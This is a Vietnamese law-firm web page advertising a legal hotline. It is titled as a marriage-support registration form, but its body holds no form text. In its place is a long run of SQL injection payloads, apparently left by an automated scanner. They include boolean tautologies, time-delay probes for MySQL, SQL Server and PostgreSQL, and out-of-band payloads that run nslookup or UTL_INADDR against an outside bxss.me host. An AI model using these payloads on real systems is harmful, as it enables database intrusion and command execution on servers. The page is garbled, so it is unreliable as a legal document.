Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Tờ khai đăng kí hoạt động hỗ trợ kết hôn

Cập nhật lần cuối lúc 15:19 ngày 12/07/2013

1
1
1
1
1'"
-1 OR 2+535-535-1=0+0+0+1 --
\
-1 OR 3+535-535-1=0+0+0+1 --
-1 OR 3*2<(0+5+535-535) --
1
-1 OR 3*2>(0+5+535-535) --
@@Rllny
JyI=
-1 OR 2+443-443-1=0+0+0+1
-1 OR 3+443-443-1=0+0+0+1
-1 OR 3*2<(0+5+443-443)
-1 OR 3*2>(0+5+443-443)
-1' OR 2+707-707-1=0+0+0+1 --
-1' OR 3+707-707-1=0+0+0+1 --
-1' OR 3*2<(0+5+707-707) --
-1' OR 3*2>(0+5+707-707) --
-1' OR 2+365-365-1=0+0+0+1 or 'y9jyVIvx'='
-1' OR 3+365-365-1=0+0+0+1 or 'y9jyVIvx'='
-1' OR 3*2<(0+5+365-365) or 'y9jyVIvx'='
-1' OR 3*2>(0+5+365-365) or 'y9jyVIvx'='
-1" OR 2+830-830-1=0+0+0+1 --
-1" OR 3+830-830-1=0+0+0+1 --
-1" OR 3*2<(0+5+830-830) --
-1" OR 3*2>(0+5+830-830) --
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/
-1; waitfor delay '0:0:9' --
-1); waitfor delay '0:0:3' --
-1); waitfor delay '0:0:0' --
1 waitfor delay '0:0:3' --
1 waitfor delay '0:0:6' --
RnMIEQBX'; waitfor delay '0:0:9' --
uMdTPCjz'; waitfor delay '0:0:0' --
-1;select pg_sleep(3); --
-1;select pg_sleep(6); --
-1);select pg_sleep(6); --
-1));select pg_sleep(6); --
bdLdZaqy';select pg_sleep(6); --
bCCdJMcy');select pg_sleep(9); --
aals2RJG'));select pg_sleep(9); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6135.34060.f2d89.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6136.34060.f2d89.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-6138.34060.f2d89.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-6139.34060.f2d89.\1.bxss.me
237'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: